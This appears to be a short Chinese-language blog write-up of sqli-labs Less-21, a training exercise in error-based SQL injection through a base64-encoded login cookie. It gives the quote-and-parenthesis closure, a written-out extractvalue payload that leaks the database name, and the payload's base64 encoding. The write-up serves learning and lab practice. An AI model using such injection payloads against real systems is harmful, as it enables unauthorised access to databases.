zoukankan      html  css  js  c++  java

  • SQLI DUMB SERIES-21

    Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

    (1)登录成功后有以下页面:

    其中红圈内的字符为admin的BASED64编码后的字符。

    (2)用burp抓包,再刷新浏览器。

    寻找闭合方式:明文:admin' --+ based64编码:YWRtaW4nICAtLSs=

    闭合方式为' )

    (3)开始报错注入,需要将payload用based63编码输入。例如:爆表名

    admin') and extractvalue(1,concat(0x7e,(select database())))and ('

     编码:

    YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpYW5kICgn

     

    由于无法解释的神圣旨意,我们徒然地到处找你;你就是孤独,你就是神秘,比恒河或者日落还要遥远。。。。。。
  • 相关阅读:
    csuoj-1004-Xi and Bo
    csuoj-1003-UC Browser
    网络命令
    linux网络配置
    java面向对象
    java类 面向对象
    java方法 Scanner、Random类
    java集合
    java数组
    java流程控制语句
  • 原文地址:https://www.cnblogs.com/momoli/p/10706303.html
Copyright © 2011-2022 走看看